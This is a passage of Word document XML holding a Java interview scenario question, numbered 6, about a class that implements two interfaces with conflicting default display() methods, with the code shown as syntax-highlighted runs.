          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="0C3D826B">
          <v:rect id="_x0000_i1891" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="720B15ED" w14:textId="233BD30D" w:rsidR="00F851C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00F851C0" w:rsidP="00F851C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario based question - </w:t>
      </w:r>
      <w:r w:rsidR="00DD4C85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD017FD" w14:textId="7C11B4C8" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F851C0" w:rsidP="00F851C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:divId w:val="1728063314"/>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explain below code and what if I want to call both the interface default methods? How you will  implement it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21491633" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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8063314"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InterfaceA</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE57939" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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8063314"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> display</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D683940" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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8063314"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Display from InterfaceA"</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22693946" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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8063314"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C6F0FF" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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8063314"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201833D1" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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8063314"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B888FD9" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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8063314"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InterfaceB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21035725" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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8063314"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> display</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1832DBB8" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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8063314"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Display from InterfaceB"</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7223DAF0" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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8063314"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649312C2" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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8063314"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79439A21" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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8063314"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317CD548" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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8063314"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MyClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>implements</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InterfaceA</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InterfaceB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0EF736" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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8063314"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF4A035" w14:textId="558E6A79" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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8063314"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533B0241" w14:textId="0C5EAA51" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F851C0" w:rsidP="000756C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
